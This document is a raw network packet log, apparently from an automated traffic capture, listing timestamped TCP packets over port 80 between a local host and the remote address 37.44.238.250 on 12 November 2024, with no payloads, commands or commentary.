                                                                                                            Nov 12, 2024 00:44:06.953517914 CET805014737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:06.953571081 CET805014737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:06.953581095 CET805014737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:07.162019968 CET805014737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:07.235842943 CET805014737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:07.235897064 CET5014780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:07.350282907 CET5014780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:07.350718975 CET5014880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:07.355420113 CET805014737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:07.355488062 CET5014780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:07.355503082 CET805014837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:07.355578899 CET5014880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:07.355671883 CET5014880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:07.360434055 CET805014837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:07.713800907 CET5014880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:07.718697071 CET805014837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:07.718710899 CET805014837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:07.719446898 CET805014837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:07.922808886 CET805014837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:07.999963999 CET805014837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:08.000011921 CET5014880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:08.120484114 CET5014880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:08.121200085 CET5014980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:08.125710964 CET805014837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:08.125756025 CET5014880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:08.125986099 CET805014937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:08.126058102 CET5014980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:08.126178980 CET5014980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:08.130899906 CET805014937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:08.479433060 CET5014980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:08.484306097 CET805014937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:08.484318972 CET805014937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:08.484386921 CET805014937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:08.691178083 CET805014937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:08.765296936 CET805014937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:08.765366077 CET5014980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:08.882567883 CET5014980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:08.882800102 CET5015080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:08.887701988 CET805015037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:08.888021946 CET805014937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:08.888119936 CET5014980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:08.888245106 CET5015080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:08.888245106 CET5015080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:08.893085003 CET805015037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:09.245074034 CET5015080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:09.250102043 CET805015037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:09.250118017 CET805015037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:09.250128031 CET805015037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:09.455274105 CET805015037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:09.510611057 CET5015080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:09.537738085 CET805015037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:09.588748932 CET5015080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:09.664540052 CET5015080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:09.665422916 CET5015180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:09.671766043 CET805015037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:09.671947002 CET5015080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:09.672388077 CET805015137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:09.672449112 CET5015180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:09.672544956 CET5015180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:09.680144072 CET805015137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:10.026386976 CET5015180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:10.033165932 CET805015137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:10.033607960 CET805015137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:10.033620119 CET805015137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:10.243560076 CET805015137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:10.291883945 CET5015180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:10.323375940 CET805015137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:10.369999886 CET5015180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:10.386140108 CET5015180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:10.386677980 CET5015280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:10.391496897 CET805015137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:10.391551971 CET805015237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:10.391561031 CET5015180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:10.391617060 CET5015280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:10.391722918 CET5015280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:10.396451950 CET805015237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:10.476828098 CET5015380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:10.477004051 CET5015280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:10.481671095 CET805015337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:10.481738091 CET5015380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:10.481868982 CET5015380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:10.486597061 CET805015337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:10.525121927 CET805015237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:10.808211088 CET805015237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:10.808309078 CET5015280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:10.838891983 CET5015380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:10.843794107 CET805015337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:10.843805075 CET805015337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:10.843813896 CET805015337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:11.048355103 CET805015337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:11.104413033 CET5015380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:11.125822067 CET805015337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:11.166893005 CET5015380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:11.241367102 CET5015380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:11.241983891 CET5015480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:11.246680975 CET805015337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:11.246779919 CET805015437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:11.250005007 CET5015380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:11.250032902 CET5015480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:11.250150919 CET5015480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:11.254868031 CET805015437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:11.604767084 CET5015480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:11.609718084 CET805015437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:11.609730959 CET805015437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:11.609747887 CET805015437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:11.815165043 CET805015437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:11.870006084 CET5015480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:11.894896984 CET805015437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:11.948132992 CET5015480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:12.030317068 CET5015580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:12.035156012 CET805015537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:12.035212994 CET5015580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:12.035393000 CET5015580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:12.040170908 CET805015537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:12.385730982 CET5015580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:12.390649080 CET805015537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:12.390661955 CET805015537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:12.390670061 CET805015537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:12.605454922 CET805015537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:12.651297092 CET5015580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:12.687433004 CET805015537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:12.729391098 CET5015580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:12.831203938 CET5015580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:12.831932068 CET5015680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:12.836771965 CET805015637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:12.836783886 CET805015537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:12.836831093 CET5015680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:12.836850882 CET5015580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:12.836967945 CET5015680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:12.841732025 CET805015637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:13.182590961 CET5015680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:13.187607050 CET805015637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:13.187623024 CET805015637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:13.187635899 CET805015637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:13.436208963 CET805015637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:13.479406118 CET5015680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:13.509829044 CET805015637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:13.557526112 CET5015680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:13.692564011 CET5015680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:13.693057060 CET5015780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:13.698882103 CET805015737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:13.699364901 CET805015637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:13.699448109 CET5015680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:13.699578047 CET5015780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:13.699578047 CET5015780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:13.704612970 CET805015737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:14.057796001 CET5015780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:14.062773943 CET805015737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:14.062787056 CET805015737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:14.062855005 CET805015737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:14.283474922 CET805015737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:14.338814974 CET5015780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:14.364649057 CET805015737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:14.417021036 CET5015780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:14.492345095 CET5015780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:14.492746115 CET5015880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:14.497487068 CET805015737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:14.497560978 CET5015780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:14.497735977 CET805015837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:14.497802019 CET5015880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:14.497889042 CET5015880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:14.502628088 CET805015837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:14.855094910 CET5015880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:14.860058069 CET805015837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:14.860300064 CET805015837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:14.860426903 CET805015837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:15.083993912 CET805015837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:15.135663986 CET5015880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:15.157047033 CET805015837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:15.198196888 CET5015880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:15.268270969 CET5015480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:15.273386955 CET5015880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:15.273861885 CET5015980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:15.280612946 CET805015837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:15.281291962 CET805015937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:15.281352043 CET5015880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:15.281392097 CET5015980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:15.281480074 CET5015980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:15.288928032 CET805015937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:15.481394053 CET5016080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:15.481522083 CET5015980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:15.488553047 CET805016037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:15.488624096 CET5016080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:15.488696098 CET5016080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:15.495755911 CET805016037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:15.529293060 CET805015937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:15.603667974 CET5016180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:15.610419989 CET805016137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:15.610476971 CET5016180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:15.610595942 CET5016180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:15.617552996 CET805016137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:15.699652910 CET805015937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:15.699706078 CET5015980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:15.838890076 CET5016080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:15.845685959 CET805016037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:15.847378016 CET805016037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:15.967978001 CET5016180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:15.974809885 CET805016137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:15.974822044 CET805016137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:15.974926949 CET805016137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:16.056735992 CET805016037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:16.140532970 CET805016037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:16.140667915 CET5016080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:16.197117090 CET805016137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:16.245060921 CET5016180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:16.274404049 CET805016137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:16.323179960 CET5016180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:16.396647930 CET5016180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:16.396651983 CET5016080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:16.400096893 CET5016280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:16.403877020 CET805016137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:16.404014111 CET5016180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:16.404304981 CET805016037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:16.404479980 CET5016080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:16.407334089 CET805016237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:16.407484055 CET5016280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:16.407484055 CET5016280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:16.414463043 CET805016237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:16.761116982 CET5016280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:16.768357038 CET805016237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:16.768372059 CET805016237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:16.768384933 CET805016237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:16.975495100 CET805016237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:17.057696104 CET805016237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:17.057751894 CET5016280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:17.185614109 CET5016380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:17.190504074 CET805016337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:17.190563917 CET5016380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:17.190670967 CET5016380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:17.195475101 CET805016337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:17.542397976 CET5016380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:17.547318935 CET805016337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:17.547328949 CET805016337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:17.547336102 CET805016337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:17.756517887 CET805016337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:17.826873064 CET805016337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:17.826927900 CET5016380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:17.943727970 CET5016380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:17.950774908 CET805016337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:17.951121092 CET5016380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:17.971991062 CET5016480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:17.978147984 CET805016437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:17.978269100 CET5016480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:17.978357077 CET5016480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:17.985356092 CET805016437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:18.323956966 CET5016480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:18.328991890 CET805016437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:18.328999043 CET805016437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:18.329004049 CET805016437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:18.545914888 CET805016437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:18.588824034 CET5016480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:18.623878956 CET805016437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:18.750483036 CET5016480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:18.752623081 CET5016580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:18.755718946 CET805016437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:18.755861998 CET5016480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:18.757461071 CET805016537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:18.757613897 CET5016580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:18.757688999 CET5016580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:18.762892962 CET805016537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:19.105048895 CET5016580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:19.110039949 CET805016537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:19.110058069 CET805016537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:19.110069990 CET805016537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:19.322906017 CET805016537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:19.401326895 CET805016537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:19.401379108 CET5016580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:19.521924019 CET5016580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:19.522535086 CET5016680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:19.527057886 CET805016537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:19.527128935 CET5016580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:19.527471066 CET805016637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:19.527525902 CET5016680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:19.527607918 CET5016680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:19.532939911 CET805016637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:19.886219025 CET5016680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:19.891199112 CET805016637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:19.891206980 CET805016637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:19.891211987 CET805016637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:20.111247063 CET805016637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:20.192753077 CET805016637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:20.192850113 CET5016680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:20.320270061 CET5016280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:20.320923090 CET5016680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:20.321346998 CET5016780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:20.327528954 CET805016737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:20.327686071 CET5016780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:20.327778101 CET5016780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:20.328376055 CET805016637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:20.328568935 CET5016680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:20.334162951 CET805016737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:20.682703018 CET5016780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:20.689083099 CET805016737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:20.689096928 CET805016737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:20.689106941 CET805016737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:20.912018061 CET805016737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:20.989120007 CET805016737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:20.989173889 CET5016780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:21.120718002 CET5016780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:21.120992899 CET5016880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:21.127805948 CET805016837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:21.127880096 CET5016880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:21.128000975 CET5016880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:21.128572941 CET805016737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:21.128623009 CET5016780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:21.134442091 CET805016837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:21.160509109 CET5016980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:21.167068958 CET805016937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:21.167464972 CET5016980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:21.167735100 CET5016980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:21.174170971 CET805016937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:21.480092049 CET5016880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:21.485949039 CET805016837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:21.485956907 CET805016837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:21.485969067 CET805016837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:21.526879072 CET5016980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:21.532393932 CET805016937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:21.532959938 CET805016937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:21.713239908 CET805016837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:21.734172106 CET805016937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:21.760736942 CET5016880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:21.776349068 CET5016980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:21.795351028 CET805016837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:21.796243906 CET5016980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:21.802750111 CET805016937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:21.802808046 CET5016980192.168.2.437.44.238.250
